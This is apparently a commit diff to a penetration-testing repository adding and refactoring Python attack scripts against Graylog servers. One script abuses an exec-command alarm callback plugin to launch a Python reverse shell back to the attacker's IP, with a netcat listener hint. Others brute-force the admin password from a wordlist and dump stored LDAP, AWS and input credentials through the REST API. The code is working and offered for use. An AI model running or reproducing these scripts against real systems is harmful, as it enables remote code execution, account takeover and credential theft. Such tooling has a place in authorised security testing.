new features

poc/graylog/alarmcallback.py

@@ -0,0 +1,95 @@
+#!/usr/bin/env python3
+
+# Graylog Create Alarm Callback to Obtain Reverse Shell
+
+# %%%%%%%%%%% Libraries %%%%%%%%%%%#
+
+import colorama
+import getpass
+import logging
+import requests
+import urllib3
+from colorama import Fore, Style
+
+colorama.init()
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# %%%%%%%%%%% Constants %%%%%%%%%%%#
+
+SEPARATOR = "[*] {0} [*]".format('=' * 110)
+
+# %%%%%%%%%% Functions %%%%%%%%%#
+
+def alarm_callback(graylogip):
+
+	graylogpass = getpass.getpass(
+		Fore.CYAN + Style.BRIGHT + "[!] Enter Graylog Admin Password: " + Style.RESET_ALL)
+
+	localIP = input("[!] Enter your local IP address: ")
+	alertid = "000000000000000000000000"
+	authurl = "http://" + graylogip + ":9000/api/system/sessions"
+	typesurl = "http://" + graylogip + ":9000/api/alerts/callbacks/types"
+	alarmsurl = "http://" + graylogip + ":9000/api/streams/000000000000000000000001/alarmcallbacks"
+
+	bashcommand = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," \
+	"socket.SOCK_STREAM);s.connect((\"" + localIP + "\",12345));os.dup2(s.fileno()," \
+	"0); os.dup2(s.fileno()," \
+	"1); os.dup2(s.fileno()," \
+	"2);import pty; pty.spawn(" \
+	"\"/bin/bash\")'"
+
+	params = {
+		"title": "testgraylog", "type": "ir.elenoon.ExeCommandAlarmCallBack",
+		"configuration": {"bashCommand": bashcommand}
+	}
+	headers = {'X-Requested-By': 'XMLHttpRequest'}
+	authparams = {'username': 'admin', 'password': graylogpass, 'host': graylogip}
+
+	print(SEPARATOR)
+	print("[!] Start a listener in port 12345, for example nc -lvp 12345")
+
+	try:
+		s = requests.Session()
+		s.headers.update(headers)
+		s.auth = ('admin', graylogpass)
+		s.post(authurl, json = authparams, verify = False)
+
+		response = s.get(typesurl, verify = False)
+
+		if (response.status_code == 200 and "ir.elenoon.ExeCommandAlarmCallBack" in
+		response.text):  # text of graylog2 plugin exec
+			print(SEPARATOR)
+			print("[!] Alarm Callback Exec Plugin Found")
+			postresponse = s.post(alarmsurl, json = params, verify = False)
+
+			if postresponse.status_code == 201:  # created status code
+				print("[!] Alarm Callback Succesfully Created")
+				data = postresponse.json()
+				alertid = str(data['alarmcallback_id'])
+
+				if (alertid != "000000000000000000000000"):
+					print("[!] Alarm Callback ID: " + alertid)
+					testurl = "http://" + graylogip + ":9000/api/alerts/callbacks/" + alertid + \
+					"/test"
+					testresponse = s.post(testurl, verify = False)
+
+					if testresponse.status_code == 200:
+						print(
+							"[!] Test Action Started: " + Fore.RED + Style.BRIGHT + "Reverse Shell Ready")
+						print(Style.RESET_ALL + SEPARATOR)
+					else:
+						print("[!] Error in Action Test")
+				else:
+					print("[!] Error in Alarm Callback ID")
+
+			else:
+				print("[!] Error in Alarm Callback Creation")
+
+		else:
+			print(SEPARATOR)
+			print("[!] Alarm Callback Exec Plugin Not Found")
+
+	except Exception as e:
+		logging.error(e, exc_info = True)
+
+# %%%%%%%%%% The End %%%%%%%%%%#

poc/graylog/bruteforcegraylog.py

@@ -2,52 +2,57 @@
 
 # Graylog Login Bruteforce
 
-#%%%%%%%%%%% Libraries %%%%%%%%%%%#
+# %%%%%%%%%%% Libraries %%%%%%%%%%%#
 
+import colorama
 import json
+import logging
+import os
 import requests
 import sys
-import os
-import colorama
 from colorama import Fore, Style
 
-#%%%%%%%%%%% Constants %%%%%%%%%%%#
+# %%%%%%%%%%% Constants %%%%%%%%%%%#
+
+SEPARATOR = "[*] {0} [*]".format('=' * 110)
+
+# %%%%%%%%%% Functions %%%%%%%%%#
+
+def graylog_brute(graylogip):
 
-separator = "[*] ============================================================================================================== [*]"
+	url = "http://" + graylogip + ":9000/api/system/sessions"
+	__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
+	file = open(os.path.join(__location__, 'dict.txt'))
+	bruteforcesuccesfull = 0
 
-#%%%%%%%%%% Functions %%%%%%%%%#
+	for line in file:
 
-def graylogbrute(graylogip):
+		graylogpassword = line.strip('\n\r')
+		params = {'username': 'admin', 'password': graylogpassword, 'host': graylogip}
+		headers = {'X-Requested-By': 'XMLHttpRequest'}
 
-    url = "http://"+graylogip+":9000/api/system/sessions"
-    __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
-    file = open(os.path.join(__location__, 'dict.txt'))
-    bruteforcesuccesfull = 0
+		try:
+			response = requests.post(url, json = params, headers = headers, verify = False)
 
-    for line in file:
-        graylogpassword = line.strip('\n\r')
-        params = {'username':'admin','password':graylogpassword,'host':graylogip}
-        headers = {'X-Requested-By': 'XMLHttpRequest'}
+			if response.status_code == 200:
 
-        try:
-            response = requests.post(url,json=params,headers=headers,verify=False)
+				print(SEPARATOR)
+				print("[!] Dictionary Attack Successful!")
+				print(SEPARATOR)
+				print("[!] Username: " + Fore.RED + Style.BRIGHT + "admin")
+				print(
+					Style.RESET_ALL + "[!] Password: " + Fore.RED + Style.BRIGHT + graylogpassword)
+				print(Style.RESET_ALL + SEPARATOR)
+				bruteforcesuccesfull = 1
+				break
 
-            if response.status_code == 200:
-                print(separator)
-                print("[!] Dictionary Attack Successful!")
-                print(separator)
-                print("[!] Username: "+Fore.RED+Style.BRIGHT+"admin")
-                print(Style.RESET_ALL + "[!] Password: "+Fore.RED+Style.BRIGHT+graylogpassword)
-                print(Style.RESET_ALL + separator)
-                bruteforcesuccesfull = 1
-                break
+		except Exception as e:
+			logging.error(e, exc_info = True)
 
-        except Exception as e:
-            pass
+	if not bruteforcesuccesfull:
 
-    if not bruteforcesuccesfull:
-        print(separator)
-        print("[!] Dictionary Attack Not Successful")
-        print(separator)
+		print(SEPARATOR)
+		print("[!] Dictionary Attack Not Successful")
+		print(SEPARATOR)
 
-#%%%%%%%%%% The End %%%%%%%%%%#
+# %%%%%%%%%% The End %%%%%%%%%%#

poc/graylog/obtaincredentialsrestapi.py

@@ -2,60 +2,72 @@
 
 # Graylog Obtain Stored Credentials via REST API
 
-#%%%%%%%%%%% Libraries %%%%%%%%%%%#
+# %%%%%%%%%%% Libraries %%%%%%%%%%%#
 
+import colorama
+import getpass
+import logging
 import requests
+import urllib3
+from colorama import Fore, Style
 from requests.auth import HTTPBasicAuth
-import colorama
+
 colorama.init()
-from colorama import Fore, Style
-import urllib3
-import getpass
 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
-#%%%%%%%%%%% Constants %%%%%%%%%%%#
+# %%%%%%%%%%% Constants %%%%%%%%%%%#
+
+SEPARATOR = "[*] {0} [*]".format('=' * 110)
+
+# %%%%%%%%%% Functions %%%%%%%%%#
+
+def obtain_ldap_credentials(graylogip):
 
-separator = "[*] ============================================================================================================== [*]"
+	ldapurl = "http://" + graylogip + ":9000/api/system/ldap/settings?pretty=true"
+	awspluginurl = "http://" + graylogip + \
+					":9000/api/system/cluster_config/org.graylog.aws.config.AWSPluginConfiguration" \
+					"?pretty=true"
+	headers = {'Accept': 'application/json'}
+	graylogpass = getpass.getpass(
+		Fore.CYAN + Style.BRIGHT + "[!] Enter Graylog Admin Password: " + Style.RESET_ALL)
 
-#%%%%%%%%%% Functions %%%%%%%%%#
+	try:
+		response = requests.get(ldapurl, auth = HTTPBasicAuth('admin', graylogpass))
 
-def obtainldapcredentials(graylogip):
+		if response.status_code == 200 and "DOCTYPE html" not in response.text:
 
-    ldapurl = "http://"+graylogip+":9000/api/system/ldap/settings?pretty=true"
-    awspluginurl = "http://"+graylogip+":9000/api/system/cluster_config/org.graylog.aws.config.AWSPluginConfiguration?pretty=true"
-    graylogpass = getpass.getpass(Fore.CYAN + Style.BRIGHT + "[!] Enter Graylog Admin Password: " + Style.RESET_ALL)
+			print(SEPARATOR)
+			print(
+				Fore.RED + Style.BRIGHT + "[!] Graylog LDAP Settings and Credentials" +
+				Style.RESET_ALL)
+			print(SEPARATOR + response.text.strip('{}').replace('\n', '\n[!]'))
+		else:
 
-    try:
-        response = requests.get(ldapurl, auth=HTTPBasicAuth('admin',graylogpass))
+			print(SEPARATOR)
+			print("[!] Error obtaining Graylog LDAP Settings and Credentials")
 
-        if (response.status_code == 200 and "DOCTYPE html" not in response.text):
-            print(separator)
-            print(Fore.RED + Style.BRIGHT + "[!] Graylog LDAP Settings and Credentials" + Style.RESET_ALL)
-            print(separator + response.text.strip('{}').replace('\n','\n[!]'))
-        else:
-            print(separator)
-            print("[!] Error obtaining Graylog LDAP Settings and Credentials")
+	except Exception as e:
+		logging.error(e, exc_info = True)
 
-    except Exception as e:
-        print(e)
-        pass
+	try:
+		response = requests.get(awspluginurl, auth = HTTPBasicAuth('admin', graylogpass),
+								headers = headers)
 
-    try:
-        response = requests.get(awspluginurl, auth=HTTPBasicAuth('admin',graylogpass))
+		if response.status_code == 200 and "DOCTYPE html" not in response.text:
 
-        if (response.status_code == 200 and "DOCTYPE html" not in response.text):
-            print(separator)
-            print(Fore.RED + Style.BRIGHT + "[!] Graylog AWS Settings and Credentials" + Style.RESET_ALL)
-            print(separator + response.text.strip('{}').replace('\n','\n[!]'))
-            print(separator)
-        else:
-            print(separator)
-            print("[!] Error obtaining Graylog AWS Settings and Credentials")
-            print(separator)
+			print(SEPARATOR)
+			print(
+				Fore.RED + Style.BRIGHT + "[!] Graylog AWS Settings and Credentials" +
+				Style.RESET_ALL)
+			print(SEPARATOR + response.text.strip('{}').replace('\n', '\n[!]'))
+			print(SEPARATOR)
+		else:
 
-    except Exception as e:
-        print(e)
-        pass
+			print(SEPARATOR)
+			print("[!] Error obtaining Graylog AWS Settings and Credentials")
+			print(SEPARATOR)
 
-#%%%%%%%%%% The End %%%%%%%%%%#
+	except Exception as e:
+		logging.error(e, exc_info = True)
 
+# %%%%%%%%%% The End %%%%%%%%%%#

poc/graylog/obtaininputsrestapi.py

@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+
+# Graylog Obtain Credentials from Inputs
+
+# %%%%%%%%%%% Libraries %%%%%%%%%%%#
+
+import colorama
+import getpass
+import json
+import logging
+import requests
+import urllib3
+from requests.auth import HTTPBasicAuth
+from colorama import Fore, Style
+
+colorama.init()
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# %%%%%%%%%%% Constants %%%%%%%%%%%#
+
+SEPARATOR = "[*] {0} [*]".format('=' * 110)
+
+# %%%%%%%%%% Functions %%%%%%%%%#
+
+def obtain_inputs(graylogip):
+
+	inputsurl = "http://" + graylogip + ":9000/api/system/inputs?pretty=true"
+	graylogpass = getpass.getpass(
+		Fore.CYAN + Style.BRIGHT + "[!] Enter Graylog Admin Password: " + Style.RESET_ALL)
+
+	try:
+		response = requests.get(inputsurl, auth = HTTPBasicAuth('admin', graylogpass))
+
+		if response.status_code == 200 and "DOCTYPE html" not in response.text:
+
+			print(SEPARATOR)
+			print("[!] Graylog Inputs with Secret Keys or Passwords")
+			data = response.json()
+			inputs = data['inputs']
+
+			for x in inputs:
+				attributes = x['attributes']
+
+				if 'password' in str(attributes) or 'secret' in str(attributes):
+					print(SEPARATOR)
+					print("[!] " + str(x['title']))
+					print(SEPARATOR)
+					for y in attributes:
+						if 'password' in str(y) or 'secret' in str(y):
+							print(Fore.RED + Style.BRIGHT + "[!] " + str(y) + ": " + str(
+								attributes[y]) + Style.RESET_ALL)
+						else:
+							print("[!] " + str(y) + ": " + str(attributes[y]))
+			print(SEPARATOR)
+
+		else:
+			print(SEPARATOR)
+			print("[!] Error obtaining Graylog Inputs")
+
+	except Exception as e:
+		logging.error(e, exc_info = True)
+
+# %%%%%%%%%% The End %%%%%%%%%%#